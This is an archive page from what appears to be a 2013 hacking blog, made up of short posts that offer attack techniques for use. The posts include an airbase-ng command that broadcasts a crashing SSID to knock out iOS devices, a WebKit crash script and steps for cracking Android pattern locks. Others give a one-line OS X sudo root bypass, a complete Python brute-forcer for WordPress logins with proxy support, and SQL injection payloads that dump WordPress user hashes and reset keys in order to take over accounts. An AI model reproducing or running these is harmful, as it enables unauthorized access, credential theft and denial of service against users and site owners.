Aug 30, 2013

Howto: DoS iOS with ssids

It's work, I can't go to Settings -> Wifi but when I turn off this ssid, everything gonna be normal. please try and take the risk.

root@kali:~# airmon-ng start wlan0
root@kali:~# airbase-ng -e " ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ" -q -c 11 mon0


Source: http://pastebin.com/Ax7FTpRN


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Cracking the Pattern Lock Protection

If you want to see full detail, please go to the Source.
 

 Requirement
- Root android device

1. Go to the /data/system
2. Read file gasture.key with hexeditor. You will find the end of file like "2C3422D33FB9DD9CDE87657408E48F4E635713CB"

3. Use SQLite browser and read in with RainbowTable
Select * from RainbowTable where hash = “2c3422d33fb9dd9cde87657408e48f4e635713cb”.  

Source: http://resources.infosecinstitute.com/android-forensics-cracking-the-pattern-lock-protection/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Webkit Crasher By Superevr [Effect iOS/OSX]

Webkit (Safari) will crash if it read Arabic character in any webpage. The problem are in the Apple CoreText font rendering framework. If you want to try it, please use

<script>
var n=String.fromCharCode(1582,32,823,816,784,1582);
document.getElementById("demo").innerHTML=n;

</script>

Source: https://news.ycombinator.com/item?id=6293824
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Aug 29, 2013

Howto: Got Root On OSX By Superevr

Get root on OS X:

sudo -k;systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Wordpress Bruteforce version 2.. by D35m0nd142

    # Wordpress Login Brute Forcer (without WPscan)
    # Sending Curl requests we can found the login password..if the login failed Curl generates the output else any output is generated :)
    # Author: D35m0nd142
    #!/usr/bin/python
     
    import os,sys,time,urllib2
    from termcolor import colored
    os.system("rm wpbrute_output.html")
    os.system("rm dir_list.txt")
    os.system("clear")
     
    try:
            target = sys.argv[1]
            username = sys.argv[2]
            wlist = sys.argv[3]
     
    except:
            time.sleep(0.6)
            print colored("\nWordpress Login Brute Forcer","green")
            print colored("By:","green"),"D35m0nd142\n"
            time.sleep(1)
            print "Usage: python wpbrute.py <target> <username> <wordlist> <proxy>\n"
            print "Example1: python wpbrute.py http://www.mywebsite.com/ admin wordlist.txt"
            print "Example2: python wpbrute.py http://www.mywebsite.com/ admin wordlist.txt '127.0.0.1:9050'\n"
            sys.exit(1)    
     
    try:
            proxy = sys.argv[4]
    except:
            proxy = "no"
     
    if "http://" not in target:
            target = "http://%s" %target
     
    print colored("\nWordpress Login Brute Forcer","green")
    print colored("By:","green"),"D35m0nd142"
    time.sleep(1)
    print "\n ... Calculating number of words in '%s' ... " %wlist
    time.sleep(1.3)
     
    words = open(sys.argv[3],"r").readlines()
     
    time.sleep(0.8)
     
    print colored("\n[+] Loaded ","green"), len(words),colored(" passwords from ","green"),"%s" %wlist, colored(" for testing....","green")  
    time.sleep(1.3)
     
    if proxy != "no":
            print colored("[+] Loaded proxy => ","green"),"%s" %proxy
     
    else:
            print "\n"
     
    time.sleep(1.1)
    print "\n ... Bruteforcing Wordpress login ... \n"
    time.sleep(1.5)
     
     
    for word in words:
            word = word.replace('\r','').replace('\n','')
     
           
            print colored(".. Attempting =>","yellow")," '%s:%s' " %(username,word)
     
            if proxy != "no":
                    curl = "curl -s --socks5 %s --url '%s/wp-login.php' -A 'Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1' --data 'log=%s&pwd=%s&wp-submit=Login&redirect_to=%s/wp-admin/&testcookie=1' -o wpbrute_output.html" %(proxy,target,username,word,target)
           
            else:
                    curl = "curl -s --url '%s/wp-login.php' -A 'Mozilla/2.0 (compatible; MSIE 6.0; Windows NT 5.2)' --data 'log=%s&pwd=%s&wp-submit=Login&redirect_to=%s/wp-admin/&testcookie=1' -o wpbrute_output.html" %(target,username,word,target)
     
            ls = "ls -l > dir_list.txt"
     
            os.system(curl)
            os.system(ls)
     
            cfile = open("dir_list.txt","r")
            cfile_read = cfile.read()
            cfile.close()
     
            if "wpbrute_output.html" in cfile_read:
                    #print "\n_________________________________________"
                    #print ".. Login not bruteforced :( "
                    ofile = open("wpbrute_output.html","r")
                    ofile_read = ofile.read()
                    ofile.close()
                    os.system("rm wpbrute_output.html")
     
                    if "Invalid username" in ofile_read or ("Nome de usu" in ofile_read and "inv" in ofile_read and "lido." in ofile_read) or "Nome utente non valido" in ofile_read:
                            print colored(".. Invalid username!\n","blue")
                            sys.exit(1)
                            #print "________________________________________\n"
     
            else:
                    print colored("\n[+] - Successfully Authentication!","red")
                    print colored("Host:","green"),"%s" %target
                    print colored("User:","green"),"%s" %username
                    print colored("Pass:","green"),"%s" %word
                    sys.exit(1)
 
 
 
Source: http://pastebin.com/f4CaEVRa



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Aug 28, 2013

Tools: Wi-fEye Wireless Pentesting Tool 1.0 Beta

Wi-fEye is designed to help with network penetration testing. It allows the user to perform a number of powerful attack automatically including WEP/WPA cracking, session hijacking and more.

Source: http://packetstormsecurity.com/files/122960

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Linux Exploit Suggester - Local Exploit - Privilege Escalation

 The Hackers uploaded numerous exploits and scripts in an attempt to compromise a Linux RedHat server.  Among these files was a broken script (that did not work) that would suggest possible exploits given the release version ‘uname -r’ of the Linux Operating System.

Source: https://github.com/PenturaLabs/Linux_Exploit_Suggester


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Bypass sudo in Mac OSX

This Metasploit module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the "admin group"), and the user has ever run the "sudo" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This Metasploit module will fail silently if the user is not an admin or if the user has never run the sudo command.

Source: http://packetstormsecurity.com/files/122965


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Get webpage without wget and curl(By Brute Logic)

When you don't have wget or curl:
root@Hacking:~$ whois -h http://www.victim.com -p80 GET /



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Aug 25, 2013

Howto: Reset Password Wordpress With SQL Injection

1. Hack with sql injection to Wordpress Plugin
-1 union Select 1,2,3,4,5,6,group_concat(user_login,----,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users
 
2. Reset any user that you want
http://{DOMAIN_NAME_HERE}/wp-login.php?action=rp&key={ACTIVATION_KEY_HERE}&login={USERNAME_HERE}
 
3. Get and activate code
-1 union Select 1,2,3,4,5,6,group_concat(user_login,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users 

4. Insert the activate code and reset password :)


Source: http://www.flippercode.com/how-to-hack-wordpress-site-using-sql-injection

 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Papers: SSL/TLS Explanation

Best SSL/TLS explanation :)

https://www.sans.org/reading-room/whitepapers/authentication/ssl-tls-whats-hood-34297


https://dl.dropboxusercontent.com/u/2330423/ssl%3Atls.pdf


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |